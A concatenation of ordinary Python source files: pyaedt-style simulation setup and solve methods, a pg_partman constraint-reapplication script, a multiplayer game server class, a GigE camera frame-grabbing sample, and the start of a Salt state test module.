use_auto_settings : bool, optional
Whether to use automatic settings for tasks and cores. The default is ``True``. Not all setup types support this option.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
References
----------
>>> oDesign.Analyze
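Examples
--------
Solve the nominal setup, requesting an illustrative four cores:
>>> import pyaedt
>>> hfss = pyaedt.Hfss()
>>> hfss.analyze_nominal(num_cores=4)
True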
"""
return self.analyze_setup(self.analysis_setup, num_cores, num_tasks, num_gpu, acf_file, use_auto_settings)
@pyaedt_function_handler()
def generate_unique_setup_name(self, setup_name=None):
"""Generate a new setup with an unique name.
Parameters
----------
setup_name : str, optional
Name of the setup. The default is ``None``.
Returns
-------
str
Name of the setup.
"""
if not setup_name:
setup_name = "Setup"
index = 2
while setup_name in self.existing_analysis_setups:
setup_name = setup_name + "_{}".format(index)
index += 1
return setup_name
@pyaedt_function_handler()
def create_setup(self, setupname="MySetupAuto", setuptype=None, props=None):
"""Create a setup.
Parameters
----------
setupname : str, optional
Name of the setup. The default is ``"MySetupAuto"``.
setuptype : optional
Type of the setup. The default is ``None``, in which case
the default type is applied.
props : dict, optional
Dictionary of analysis properties appropriate for the design and analysis.
If no values are passed, default values are used.
Returns
-------
:class:`pyaedt.modules.SolveSetup.Setup`
References
----------
>>> oModule.InsertSetup
Examples
--------
Create an SBR+ setup using advanced Doppler
processing for automotive radar.
>>> import pyaedt
>>> hfss = pyaedt.Hfss(solution_type='SBR+')
>>> setup1 = hfss.create_setup(setupname='Setup1')
>>> setup1.props["IsSbrRangeDoppler"] = True
>>> setup1.props["SbrRangeDopplerTimeVariable"] = "time_var"
>>> setup1.props["SbrRangeDopplerCenterFreq"] = "76.5GHz"
>>> setup1.props["SbrRangeDopplerRangeResolution"] = "0.15meter"
>>> setup1.props["SbrRangeDopplerRangePeriod"] = "100meter"
>>> setup1.props["SbrRangeDopplerVelocityResolution"] = "0.2m_per_sec"
>>> setup1.props["SbrRangeDopplerVelocityMin"] = "-30m_per_sec"
>>> setup1.props["SbrRangeDopplerVelocityMax"] = "30m_per_sec"
>>> setup1.props["DopplerRayDensityPerWavelength"] = "0.2"
>>> setup1.props["MaxNumberOfBounces"] = "3"
>>> setup1.update()
...
pyaedt info: Sweep was created correctly.
"""
if props is None:
props = {}
if setuptype is None:
setuptype = self.design_solutions.default_setup
name = self.generate_unique_setup_name(setupname)
setup = Setup(self, setuptype, name)
if self.design_type == "HFSS" and not self.excitations and "MaxDeltaS" in setup.props:
new_dict = OrderedDict()
for k, v in setup.props.items():
if k == "MaxDeltaS":
new_dict["MaxDeltaE"] = 0.01
else:
new_dict[k] = v
setup.props = new_dict
setup.create()
if props:
for el in props:
setup.props[el] = props[el]
setup.update()
self.analysis_setup = name
self.setups.append(setup)
return setup
@pyaedt_function_handler()
def delete_setup(self, setupname):
"""Delete a setup.
Parameters
----------
setupname : str
Name of the setup.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
References
----------
>>> oModule.DeleteSetups
Examples
--------
Create a setup and then delete it.
>>> import pyaedt
>>> hfss = pyaedt.Hfss()
>>> setup1 = hfss.create_setup(setupname='Setup1')
>>> hfss.delete_setup(setupname='Setup1')
...
pyaedt info: Sweep was deleted correctly.
"""
if setupname in self.existing_analysis_setups:
self.oanalysis.DeleteSetups([setupname])
for s in self.setups:
if s.name == setupname:
self.setups.remove(s)
return True
return False
@pyaedt_function_handler()
def edit_setup(self, setupname, properties_dict):
"""Modify a setup.
Parameters
----------
setupname : str
Name of the setup.
properties_dict : dict
Dictionary containing the property to update with the value.
Returns
-------
:class:`pyaedt.modules.SolveSetup.Setup`
References
----------
>>> oModule.EditSetup
"""
setuptype = self.design_solutions.default_setup
setup = Setup(self, setuptype, setupname, isnewsetup=False)
setup.update(properties_dict)
self.analysis_setup = setupname
return setup
@pyaedt_function_handler()
def get_setup(self, setupname):
"""Get the setup from the current design.
Parameters
----------
setupname : str
Name of the setup.
Returns
-------
:class:`pyaedt.modules.SolveSetup.Setup`
"""
setuptype = self.design_solutions.default_setup
setup = Setup(self, setuptype, setupname, isnewsetup=False)
if setup.props:
self.analysis_setup = setupname
return setup
@pyaedt_function_handler()
def create_output_variable(self, variable, expression, solution=None):
"""Create or modify an output variable.
Parameters
----------
variable : str
Name of the variable.
expression :
Value for the variable.
solution :
Name of the solution in the format `"setup_name : sweep_name"`.
If `None`, the first available solution is used. Default is `None`.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
References
----------
>>> oModule.CreateOutputVariable
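Examples
--------
A minimal usage sketch, assuming a solved two-port HFSS design; the variable
name and expression are assumptions.
>>> import pyaedt
>>> hfss = pyaedt.Hfss()
>>> hfss.create_output_variable("return_loss", "dB(S(1,1))")
True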
"""
oModule = self.ooutput_variable
if solution is None:
solution = self.existing_analysis_sweeps[0]
if variable in self.output_variables:
oModule.EditOutputVariable(variable, expression, variable, solution, self.solution_type, [])
else:
oModule.CreateOutputVariable(variable, expression, solution, self.solution_type, [])
return True
@pyaedt_function_handler()
def get_output_variable(self, variable, solution=None):
"""Retrieve the value of the output variable.
Parameters
----------
variable : str
Name of the variable.
solution :
Name of the solution in the format `"setup_name : sweep_name"`.
If `None`, the first available solution is used. Default is `None`.
Returns
-------
type
Value of the output variable.
References
----------
>>> oDesign.GetNominalVariation
>>> oModule.GetOutputVariableValue
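Examples
--------
A minimal usage sketch, assuming an output variable named ``"return_loss"``
was already created in a solved design.
>>> import pyaedt
>>> hfss = pyaedt.Hfss()
>>> value = hfss.get_output_variable("return_loss")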
"""
assert variable in self.output_variables, "Output variable {} does not exist.".format(variable)
nominal_variation = self.odesign.GetNominalVariation()
if solution is None:
solution = self.existing_analysis_sweeps[0]
value = self.ooutput_variable.GetOutputVariableValue(
variable, nominal_variation, solution, self.solution_type, []
)
return value
@pyaedt_function_handler()
def get_object_material_properties(self, object_list=None, prop_names=None):
"""Retrieve the material properties for a list of objects and return them in a dictionary.
This high-level function ignores objects with no defined material properties.
Parameters
----------
object_list : list, optional
List of objects to get material properties for. The default is ``None``,
in which case material properties are retrieved for all objects.
prop_names : str or list, optional
Property or list of properties to export. The default is ``None``, in
which case all properties are exported.
Returns
-------
dict
Dictionary of objects with material properties.
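Examples
--------
A minimal usage sketch; the object names and the ``"permittivity"`` property
are assumptions.
>>> import pyaedt
>>> hfss = pyaedt.Hfss()
>>> props = hfss.get_object_material_properties(["box1", "box2"], "permittivity")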
"""
if object_list:
if not isinstance(object_list, list):
object_list = [object_list]
else:
object_list = self.modeler.object_names
if prop_names:
if not isinstance(prop_names, list):
prop_names = [prop_names]
props_dict = {}
for entry in object_list:
mat_name = self.modeler[entry].material_name
mat_props = self._materials[mat_name]
if prop_names is None:
props_dict[entry] = mat_props._props
else:
props_dict[entry] = {}
for prop_name in prop_names:
props_dict[entry][prop_name] = mat_props._props[prop_name]
return props_dict
@pyaedt_function_handler()
def analyze_setup(self, name, num_cores=None, num_tasks=None, num_gpu=None, acf_file=None, use_auto_settings=True):
"""Analyze a design setup.
Parameters
----------
name : str
Name of the setup, which can be an optimetric setup or a simple setup.
num_cores : int, optional
Number of simulation cores. The default is ``None``.
num_tasks : int, optional
Number of simulation tasks. The default is ``None``.
num_gpu : int, optional
Number of simulation graphics processing units. The default is ``None``.
acf_file : str, optional
Full path to a custom ACF file. The default is ``None``.
use_auto_settings : bool, optional
Whether to use automatic settings for tasks and cores. The default is ``True``.
Not all setup types support this option.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
References
----------
>>> oDesign.Analyze
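Examples
--------
A minimal usage sketch, assuming a setup named ``'Setup1'`` exists in the
active design.
>>> import pyaedt
>>> hfss = pyaedt.Hfss()
>>> hfss.analyze_setup("Setup1", num_cores=4)
True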
"""
set_custom_dso = False
active_config = self._desktop.GetRegistryString(r"Desktop/ActiveDSOConfigurations/" + self.design_type)
if acf_file:
self._desktop.SetRegistryFromFile(acf_file)
# Read the configuration name from the ACF file into a separate variable so the
# setup name passed in ``name`` (used later to launch the solve) is not overwritten.
acf_name = ""
with open(acf_file, "r") as f:
lines = f.readlines()
for line in lines:
if "ConfigName" in line:
acf_name = line.strip().split("=")[1]
break
if acf_name:
try:
self.set_registry_key(r"Desktop/ActiveDSOConfigurations/" + self.design_type, acf_name)
set_custom_dso = True
except:
pass
elif num_gpu or num_tasks or num_cores:
config_name = "pyaedt_config"
source_name = os.path.join(self.pyaedt_dir, "misc", "pyaedt_local_config.acf")
target_name = os.path.join(self.working_directory, config_name + ".acf")
shutil.copy2(source_name, target_name)
if num_cores:
update_hpc_option(target_name, "NumCores", num_cores, False)
if num_gpu:
update_hpc_option(target_name, "NumGPUs", num_gpu, False)
if num_tasks:
update_hpc_option(target_name, "NumEngines", num_tasks, False)
update_hpc_option(target_name, "ConfigName", config_name, True)
update_hpc_option(target_name, "DesignType", self.design_type, True)
if self.design_type == "Icepak":
use_auto_settings = False
update_hpc_option(target_name, "UseAutoSettings", self.design_type, use_auto_settings)
try:
self._desktop.SetRegistryFromFile(target_name)
self.set_registry_key(r"Desktop/ActiveDSOConfigurations/" + self.design_type, config_name)
set_custom_dso = True
except:
pass
if name in self.existing_analysis_setups:
try:
self.logger.info("Solving design setup %s", name)
self.odesign.Analyze(name)
except:
if set_custom_dso:
self.set_registry_key(r"Desktop/ActiveDSOConfigurations/" + self.design_type, active_config)
self.logger.error("Error in Solving Setup %s", name)
return False
else:
try:
self.logger.info("Solving Optimetrics")
self.ooptimetrics.SolveSetup(name)
except:
if set_custom_dso:
self.set_registry_key(r"Desktop/ActiveDSOConfigurations/" + self.design_type, active_config)
self.logger.error("Error in Solving or Missing Setup %s", name)
return False
if set_custom_dso:
self.set_registry_key(r"Desktop/ActiveDSOConfigurations/" + self.design_type, active_config)
self.logger.info("Design setup %s solved correctly", name)
return True
@pyaedt_function_handler()
def solve_in_batch(self, filename=None, machine="local", run_in_thread=False):
"""Analyze a design setup in batch mode.
.. note::
To use this function, the project must be closed.
Parameters
----------
filename : str, optional
Full path and name of the project file to solve. The default is ``None``, in which
case the active project is solved.
machine : str, optional
Name of the machine if remote. The default is ``"local"``.
run_in_thread : bool, optional
Whether to submit the batch command as a thread. The default is
``False``.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
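Examples
--------
A minimal usage sketch; the active project is closed before the batch solve
starts.
>>> import pyaedt
>>> hfss = pyaedt.Hfss()
>>> hfss.solve_in_batch()
True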
"""
if not filename:
filename = self.project_file
self.close_project()
if machine == "local":
# -Monitor option used as workaround for R2 BatchSolve not exiting properly at the end of the Batch job
options = " -ng -BatchSolve -Monitor "
else:
options = " -ng -distribute -machinelist list=" + machine + " -Batchsolve "
self.logger.info("Batch Solve Options: " + options)
if os.name == "posix":
batch_run = os.path.join(
self.desktop_install_dir + "/ansysedt" + chr(34) + options + chr(34) + filename + chr(34)
)
else:
batch_run = (
chr(34) + self.desktop_install_dir + "/ansysedt.exe" + chr(34) + options + chr(34) + filename + chr(34)
)
"""
check for existing solution directory and delete if present so we
dont have old .asol files etc
"""
self.logger.info("Solving model in batch mode on " + machine)
self.logger.info("Batch Job command:" + batch_run)
if run_in_thread:
def thread_run():
""" """
os.system(batch_run)
x = threading.Thread(target=thread_run)
x.start()
else:
os.system(batch_run)
self.logger.info("Batch job finished.")
return True
@pyaedt_function_handler()
def submit_job(
self, clustername, aedt_full_exe_path=None, numnodes=1, numcores=32, wait_for_license=True, setting_file=None
):
"""Submit a job to be solved on a cluster.
Parameters
----------
clustername : str
Name of the cluster to submit the job to.
aedt_full_exe_path : str, optional
Full path to the AEDT executable file. The default is ``None``, in which
case ``"/clustername/AnsysEM/AnsysEM2x.x/Win64/ansysedt.exe"`` is used.
numnodes : int, optional
Number of nodes. The default is ``1``.
numcores : int, optional
Number of cores. The default is ``32``.
wait_for_license : bool, optional
Whether to wait for the license to be validated. The default is ``True``.
setting_file : str, optional
Name of the file to use as a template. The default value is ``None``.
Returns
-------
type
ID of the job.
References
----------
>>> oDesktop.SubmitJob
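Examples
--------
A minimal usage sketch; the cluster name is an assumption.
>>> import pyaedt
>>> hfss = pyaedt.Hfss()
>>> job_id = hfss.submit_job("mycluster", numnodes=2, numcores=64)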
"""
project_file = self.project_file
project_path = self.project_path
if not aedt_full_exe_path:
version = self.odesktop.GetVersion()[2:6]
if os.path.exists(r"\\" + clustername + r"\AnsysEM\AnsysEM{}\Win64\ansysedt.exe".format(version)):
aedt_full_exe_path = (
r"\\\\\\\\" + clustername + r"\\\\AnsysEM\\\\AnsysEM{}\\\\Win64\\\\ansysedt.exe".format(version)
)
elif os.path.exists(r"\\" + clustername + r"\AnsysEM\AnsysEM{}\Linux64\ansysedt".format(version)):
aedt_full_exe_path = (
r"\\\\\\\\" + clustername + r"\\\\AnsysEM\\\\AnsysEM{}\\\\Linux64\\\\ansysedt".format(version)
)
else:
self.logger.error("AEDT path does not exist. Please provide a full path.")
return False
else:
if not os.path.exists(aedt_full_exe_path):
self.logger.error("Aedt Path doesn't exists. Please provide a full path")
return False
aedt_full_exe_path = aedt_full_exe_path.replace("\\", "\\\\")
self.close_project()
path_file = os.path.dirname(__file__)
destination_reg = os.path.join(project_path, "Job_settings.areg")
if not setting_file:
setting_file = os.path.join(path_file, "..", "misc", "Job_Settings.areg")
shutil.copy(setting_file, destination_reg)
f1 = open(destination_reg, "w")
with open(setting_file) as f:
lines = f.readlines()
for line in lines:
if "\\ $begin" == line[:8]:
lin = "\\ $begin \\'{}\\'\\\n".format(clustername)
f1.write(lin)
elif "\\ $end" == line[:6]:
lin = "\\ $end \\'{}\\'\\\n".format(clustername)
f1.write(lin)
elif "NumCores" in line:
lin = "\\ \\ \\ \\ NumCores={}\\\n".format(numcores)
f1.write(lin)
elif "NumNodes=1" in line:
lin = "\\ \\ \\ \\ NumNodes={}\\\n".format(numnodes)
f1.write(lin)
elif "ProductPath" in line:
lin = "\\ \\ ProductPath =\\'{}\\'\\\n".format(aedt_full_exe_path)
f1.write(lin)
elif "WaitForLicense" in line:
lin = "\\ \\ WaitForLicense={}\\\n".format(str(wait_for_license).lower())
f1.write(lin)
else:
f1.write(line)
f1.close()
return self.odesktop.SubmitJob(os.path.join(project_path, "Job_settings.areg"), project_file)
@pyaedt_function_handler()
def _export_touchstone(
self, solution_name=None, sweep_name=None, file_name=None, variations=None, variations_value=None
):
"""Export the Touchstone file to a local folder.
Parameters
----------
solution_name : str, optional
Name of the solution that has been solved.
sweep_name : str, optional
Name of the sweep that has been solved.
Either omit this parameter or set it to the same value as ``solution_name``.
file_name : str, optional
Full path and name for the Touchstone file. The default is ``None``,
which exports the file to the working directory.
variations : list, optional
List of all parameter variations. For example, ``["$AmbientTemp", "$PowerIn"]``.
The default is ``None``.
variations_value : list, optional
List of all parameter variation values. For example, ``["22cel", "100"]``.
The default is ``None``.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
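Examples
--------
A minimal usage sketch, assuming a solved setup named ``'Setup1'`` with a
sweep named ``'Sweep1'``.
>>> import pyaedt
>>> hfss = pyaedt.Hfss()
>>> hfss._export_touchstone(solution_name="Setup1", sweep_name="Sweep1")
True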
"""
if variations is None:
variations = list(self.available_variations.nominal_w_values_dict.keys())
if variations_value is None:
variations_value = [str(x) for x in list(self.available_variations.nominal_w_values_dict.values())]
if solution_name is None:
nominal_sweep_list = [x.strip() for x in self.nominal_sweep.split(":")]
solution_name = nominal_sweep_list[0]
if self.design_type == "Circuit Design":
sweep_name = solution_name
else:
if sweep_name is None:
for sol in self.existing_analysis_sweeps:
if solution_name == sol.split(":")[0].strip():
sweep_name = sol.split(":")[1].strip()
break
if self.design_type == "HFSS 3D Layout Design":
n = str(len(self.port_list))
else:
n = str(len(self.excitations))
# Normalize the save path
if not file_name:
appendix = ""
for v, vv in zip(variations, variations_value):
appendix += "_" + v + vv.replace("'", "")
ext = ".S" + n + "p"
filename = os.path.join(self.working_directory, solution_name + "_" + sweep_name + appendix + ext)
else:
filename = file_name.replace("//", "/").replace("\\", "/")
self.logger.info("Exporting Touchstone " + filename)
DesignVariations = ""
for i in range(len(variations)):
DesignVariations += str(variations[i]) + "='" + str(variations_value[i].replace("'", "")) + "' "
# DesignVariations = "$AmbientTemp=\'22cel\' $PowerIn=\'100\'"
# array containing "SetupName:SolutionName" pairs (note that setup and solution are separated by a colon)
SolutionSelectionArray = [solution_name + ":" + sweep_name]
# 2=tab delimited spreadsheet (.tab), 3= touchstone (.sNp), 4= CitiFile (.cit),
# 7=Matlab (.m), 8=Terminal Z0 spreadsheet
FileFormat = 3
OutFile = filename # full path of output file
# array containing the frequencies to export; use ["all"] for all frequencies
FreqsArray = ["all"]
DoRenorm = True # perform renormalization before export
RenormImped = 50 # Real impedance value in ohm, for renormalization
DataType = "S" # Type: "S", "Y", or "Z" matrix to export
Pass = -1 # The pass to export. -1 = export all passes.
ComplexFormat = 0 # 0=Magnitude/Phase, 1=Real/Imaginary, 2=dB/Phase
DigitsPrecision = 15 # Touchstone number of digits precision
IncludeGammaImpedance = True # Include Gamma and Impedance in comments
NonStandardExtensions = False # Support for non-standard Touchstone extensions
if self.design_type == "HFSS":
self.osolution.ExportNetworkData(
DesignVariations,
SolutionSelectionArray,
FileFormat,
OutFile,
FreqsArray,
DoRenorm,
RenormImped,
DataType,
Pass,
ComplexFormat,
DigitsPrecision,
False,
IncludeGammaImpedance,
NonStandardExtensions,
)
else:
self.odesign.ExportNetworkData(
DesignVariations,
SolutionSelectionArray,
FileFormat,
OutFile,
FreqsArray,
DoRenorm,
RenormImped,
DataType,
Pass,
ComplexFormat,
DigitsPrecision,
False,
IncludeGammaImpedance,
NonStandardExtensions,
)
self.logger.info("Touchstone correctly exported to %s", filename)
return True
@pyaedt_function_handler()
def value_with_units(self, value, units=None):
"""Combine a number and a string containing the unit in a single string e.g. "1.2mm".
If the units are not specified, the model units are used.
If value is a string (like containing an expression), it is returned as is.
Parameters
----------
value : float, int, str
Value of the number or string containing an expression.
units : str, optional
Units to combine with value.
Returns
-------
str
String that combines the value and the units (e.g. "1.2mm").
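Examples
--------
A minimal usage sketch.
>>> import pyaedt
>>> hfss = pyaedt.Hfss()
>>> hfss.value_with_units(1.2, "mm")
'1.2mm'
>>> hfss.value_with_units("frequency_sweep")
'frequency_sweep'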
"""
if isinstance(value, str):
val = value
else:
if units is None:
units = self.modeler.model_units
val = "{0}{1}".format(value, units)
return val
|
reapply_constraints.py
|
#!/usr/bin/env python
import argparse, psycopg2, sys, time
from multiprocessing import Process
parser = argparse.ArgumentParser(description="Script for reapplying additional constraints managed by pg_partman on child tables. See docs for additional info on this special constraint management. Script runs in two distinct modes: 1) Drop all constraints 2) Apply all constraints. Typical usage would be to run the drop mode, edit the data, then run apply mode to re-create all constraints on a partition set.")
parser.add_argument('-p', '--parent', required=True, help="Parent table of an already created partition set. (Required)")
parser.add_argument('-c', '--connection', default="host=localhost", help="""Connection string for use by psycopg to connect to your database. Defaults to "host=localhost".""")
parser.add_argument('-d', '--drop_constraints', action="store_true", help="Drop all constraints managed by pg_partman. Drops constraints on all child tables including current & future.")
parser.add_argument('-a', '--add_constraints', action="store_true", help="Apply configured constraints to all child tables older than the premake value.")
parser.add_argument('-j', '--jobs', type=int, default=0, help="Use the python multiprocessing library to recreate indexes in parallel. Value for -j is number of simultaneous jobs to run. Note that this is per table, not per index. Be very careful setting this option if load is a concern on your systems.")
parser.add_argument('-w', '--wait', type=float, default=0, help="Wait the given number of seconds after a table has had its constraints dropped or applied before moving on to the next. When used with -j, this will set the pause between the batches of parallel jobs instead.")
parser.add_argument('--dryrun', action="store_true", help="Show what the script will do without actually running it against the database. Highly recommend reviewing this before running.")
parser.add_argument('-q', '--quiet', action="store_true", help="Turn off all output.")
args = parser.parse_args()
if args.parent.find(".") < 0:
print("Parent table must be schema qualified")
sys.exit(2)
if args.drop_constraints and args.add_constraints:
print("Can only set one or the other of --drop_constraints (-d) and --add_constraints (-a)")
sys.exit(2)
if not args.drop_constraints and not args.add_constraints:
print("Must set one of --drop_constraints (-d) or --add_constraints (-a)")
sys.exit(2)
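# Typical usage (a sketch; the table name and connection string are assumptions):
# python reapply_constraints.py -p public.orders -c "host=localhost dbname=mydb" --drop_constraints
# ... modify the data in the older child tables ...
# python reapply_constraints.py -p public.orders -c "host=localhost dbname=mydb" --add_constraints -j 4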
def create_conn():
conn = psycopg2.connect(args.connection)
return conn
def close_conn(conn):
conn.close()
def get_partman_schema(conn):
cur = conn.cursor()
sql = "SELECT nspname FROM pg_catalog.pg_namespace n, pg_catalog.pg_extension e WHERE e.extname = 'pg_partman' AND e.extnamespace = n.oid"
cur.execute(sql)
partman_schema = cur.fetchone()[0]
cur.close()
return partman_schema
def get_children(conn, partman_schema):
cur = conn.cursor()
sql = "SELECT " + partman_schema + ".show_partitions(%s, %s)"
cur.execute(sql, [args.parent, 'ASC'])
child_list = cur.fetchall()
cur.close()
return child_list
def get_premake(conn, partman_schema):
cur = conn.cursor()
sql = "SELECT premake FROM " + partman_schema + ".part_config WHERE parent_table = %s"
cur.execute(sql, [args.parent])
premake = int(cur.fetchone()[0])
cur.close()
return premake
def apply_proc(child_table, partman_schema):
conn = create_conn()
conn.autocommit = True
cur = conn.cursor()
sql = "SELECT " + partman_schema + ".apply_constraints(%s, %s, %s, %s)"
debug = False
if not args.quiet:
debug = True
print(cur.mogrify(sql, [args.parent, child_table, False, debug]))
if not args.dryrun:
cur.execute(sql, [args.parent, child_table, False, debug])
cur.close()
close_conn(conn)
def drop_proc(child_table, partman_schema):
conn = create_conn()
conn.autocommit = True
cur = conn.cursor()
sql = "SELECT " + partman_schema + ".drop_constraints(%s, %s, %s)"
debug = False
if not args.quiet:
debug = True
print(cur.mogrify(sql, [args.parent, child_table, debug]))
if not args.dryrun:
cur.execute(sql, [args.parent, child_table, debug])
cur.close()
close_conn(conn)
if __name__ == "__main__":
main_conn = create_conn()
partman_schema = get_partman_schema(main_conn)
child_list = get_children(main_conn, partman_schema)
premake = get_premake(main_conn, partman_schema)
if args.add_constraints:
# Remove tables from the list of child tables that shouldn't have constraints yet
for x in range((premake * 2) + 1):
child_list.pop()
if args.jobs == 0:
for c in child_list:
if args.drop_constraints:
drop_proc(c[0], partman_schema)
if args.add_constraints:
apply_proc(c[0], partman_schema)
if args.wait > 0:
time.sleep(args.wait)
else:
child_list.reverse()
while len(child_list) > 0:
if not args.quiet:
print("Jobs left in queue: " + str(len(child_list)))
if len(child_list) < args.jobs:
args.jobs = len(child_list)
processlist = []
for num in range(0, args.jobs):
c = child_list.pop()
if args.drop_constraints:
p = Process(target=drop_proc, args=(c[0], partman_schema))
if args.add_constraints:
p = Process(target=apply_proc, args=(c[0], partman_schema))
p.start()
processlist.append(p)
for j in processlist:
j.join()
if args.wait > 0:
time.sleep(args.wait)
sql = 'ANALYZE ' + args.parent
main_cur = main_conn.cursor()
if not args.quiet:
print(main_cur.mogrify(sql))
if not args.dryrun:
main_cur.execute(sql)
close_conn(main_conn)
|
spaceteam.py
|
import random
from server import Command, commands
from proto.spaceteam_pb2 import SpaceteamPacket
from threading import Thread
BASE_TIME = 50
LOSE_POINTS = 0
WIN_POINTS = 200
POINT_INCREMENT = 15
POINT_DECREMENT = 15
class SpaceTeam:
def __init__(self, lobby, server):
self.lobby = lobby
self.server = server
self.players = []
self.commands = []
self.state = None
self.clock = 0
self.sector = 1
self.life = 100
self.packet = SpaceteamPacket()
@staticmethod
def getPlayerId(address):
ip_addr, port = address
return '{}:{}'.format(ip_addr, port)
def addPlayer(self, address):
ip_addr, port = address
self.players.append({
'ip_addr': ip_addr,
'port': port,
'ready': False
})
def removePlayer(self, address):
ip_addr, port = address
self.players = [*filter(
lambda player:
player['ip_addr'] != ip_addr or player['port'] != port,
self.players
)]
def toggleReady(self, address, state):
ip_addr, port = address
self.players = [*map(
lambda player:
{ **player, 'ready': state }
if player['ip_addr'] == ip_addr and player['port'] == port
else player,
self.players
)]
# Check if all players are ready
return all(player['ready'] for player in self.players)
def updateLife(self, amount):
self.life += amount
# if self.life > 100:
# self.life = 100
print('[LIFE] Life Remaining: {}'.format(self.life))
def checkResolved(self, panel, command):
for cmd in range(len(self.commands)):
slug = self.commands[cmd].name.upper().replace(' ', '_')
props = str(self.commands[cmd].command).upper()
print(slug, props, command, panel)
if (slug == command) and (props == str(panel).upper()):
self.commands[cmd].isResolved = True
self.commands[cmd].state = self.commands[cmd].command
self.updateLife(25)
print("Successfully Resolved", panel, " to ", command)
break
def _start(self):
no_command = Command(commands.types.NO_COMMAND, self.server)
no_command.spawn(self.players)
if len(self.players) == 1: panelRange = 7
elif len(self.players) == 2: panelRange = 13
elif len(self.players) == 3: panelRange = 20
elif len(self.players) == 4: panelRange = 27
else: return
panels = [ i for i in range(panelRange) ]
panels = [ Command(panel, self.server, updateLife=self.updateLife) for panel in panels ]
print([i.name for i in panels])
self.commands = random.sample(panels, len(self.players))
while self.life > LOSE_POINTS and self.life < WIN_POINTS:
for cmd in range(len(self.commands)):
if self.commands[cmd].isResolved:
# Populate with new commands
address = (self.players[cmd]['ip_addr'], self.players[cmd]['port'])
self.commands[cmd] = random.sample(panels, 1)[0]
self.commands[cmd].spawn(address)
packet = self.packet
payload = packet.GameStatePacket()
payload.type = packet.GAME_STATE
payload.update = packet.GameStatePacket.GAME_OVER
for cmd in range(len(self.commands)):
self.commands[cmd].isResolved = True
if self.life <= LOSE_POINTS:
payload.isWin = False
self.server.connection.broadcast(self.players, payload)
elif self.life >= WIN_POINTS:
payload.isWin = True
self.server.connection.broadcast(self.players, payload)
def start(self):
Thread(target=self._start).start()
|
ConnectSpecCamera.py
|
# -*- coding: utf-8 -*-
import time
import sys
import threading
import msvcrt
from ctypes import *
sys.path.append("../MvImport")
from MvCameraControl_class import *
g_bExit = False
# Define a worker function for the frame-grabbing thread
def work_thread(cam, pData):
stOutFrame = MV_FRAME_OUT()
memset(byref(stOutFrame), 0, sizeof(stOutFrame))
while True:
ret = cam.MV_CC_GetImageBuffer(stOutFrame, 1000)
if None != stOutFrame.pBufAddr and 0 == ret:
print ("get one frame: Width[%d], Height[%d], nFrameNum[%d]" % (stOutFrame.stFrameInfo.nWidth, stOutFrame.stFrameInfo.nHeight, stOutFrame.stFrameInfo.nFrameNum))
nRet = cam.MV_CC_FreeImageBuffer(stOutFrame)
else:
print ("no data[0x%x]" % ret)
if g_bExit:
break
if __name__ == "__main__":
stDevInfo = MV_CC_DEVICE_INFO()
stGigEDev = MV_GIGE_DEVICE_INFO()
if sys.version >= '3':
deviceIp = input("please input current camera ip : ")
netIp = input("please input net export ip : ")
else:
deviceIp = raw_input("please input current camera ip : ")
netIp = raw_input("please input net export ip : ")
deviceIpList = deviceIp.split('.')
stGigEDev.nCurrentIp = (int(deviceIpList[0]) << 24) | (int(deviceIpList[1]) << 16) | (int(deviceIpList[2]) << 8) | int(deviceIpList[3])
netIpList = netIp.split('.')
stGigEDev.nNetExport = (int(netIpList[0]) << 24) | (int(netIpList[1]) << 16) | (int(netIpList[2]) << 8) | int(netIpList[3])
stDevInfo.nTLayerType = MV_GIGE_DEVICE
stDevInfo.SpecialInfo.stGigEInfo = stGigEDev
# ch:创建相机实例 | en:Create Camera Object
cam = MvCamera()
# ch:选择设备并创建句柄 | en:Select device and create handle
ret = cam.MV_CC_CreateHandle(stDevInfo)
if ret != 0:
print ("create handle fail! ret[0x%x]" % ret)
sys.exit()
# ch:打开设备 | en:Open device
ret = cam.MV_CC_OpenDevice(MV_ACCESS_Exclusive, 0)
if ret != 0:
print ("open device fail! ret[0x%x]" % ret)
sys.exit()
# ch:探测网络最佳包大小(只对GigE相机有效) | en:Detection network optimal package size(It only works for the GigE camera)
if stDevInfo.nTLayerType == MV_GIGE_DEVICE:
nPacketSize = cam.MV_CC_GetOptimalPacketSize()
if int(nPacketSize) > 0:
ret = cam.MV_CC_SetIntValue("GevSCPSPacketSize",nPacketSize)
if ret != 0:
print ("Warning: Set Packet Size fail! ret[0x%x]" % ret)
else:
print ("Warning: Get Packet Size fail! ret[0x%x]" % nPacketSize)
# ch:设置触发模式为off | en:Set trigger mode as off
ret = cam.MV_CC_SetEnumValue("TriggerMode", MV_TRIGGER_MODE_OFF)
if ret != 0:
print ("set trigger mode fail! ret[0x%x]" % ret)
sys.exit()
# ch:开始取流 | en:Start grab image
ret = cam.MV_CC_StartGrabbing()
if ret != 0:
print ("start grabbing fail! ret[0x%x]" % ret)
sys.exit()
try:
hThreadHandle = threading.Thread(target=work_thread, args=(cam, None))
hThreadHandle.start()
except:
print ("error: unable to start thread")
print ("press a key to stop grabbing.")
msvcrt.getch()
g_bExit = True
hThreadHandle.join()
# ch:停止取流 | en:Stop grab image
ret = cam.MV_CC_StopGrabbing()
if ret != 0:
print ("stop grabbing fail! ret[0x%x]" % ret)
sys.exit()
# ch:关闭设备 | Close device
ret = cam.MV_CC_CloseDevice()
if ret != 0:
print ("close deivce fail! ret[0x%x]" % ret)
sys.exit()
# ch:销毁句柄 | Destroy handle
ret = cam.MV_CC_DestroyHandle()
if ret != 0:
print ("destroy handle fail! ret[0x%x]" % ret)
sys.exit()
|
test_state.py
|
# -*- coding: utf-8 -*-
# Import Python libs
from __future__ import absolute_import, print_function, unicode_literals
import logging
import os
import shutil
import sys
import tempfile
import textwrap
import threading
import time
# Import Salt Testing libs
from tests.support.case import ModuleCase
from tests.support.helpers import with_tempdir
from tests.support.unit import skipIf
from tests.support.paths import BASE_FILES, TMP, TMP_PILLAR_TREE
from tests.support.mixins import SaltReturnAssertsMixin
# Import Salt libs
import salt.utils.atomicfile
import salt.utils.files
import salt.utils.path
import salt.utils.platform
import salt.utils.stringutils
from salt.modules.virtualenv_mod import KNOWN_BINARY_NAMES
# Import 3rd-party libs
from salt.ext import six
log = logging.getLogger(__name__)
DEFAULT_ENDING = salt.utils.stringutils.to_bytes(os.linesep)
def trim_line_end(line):
'''
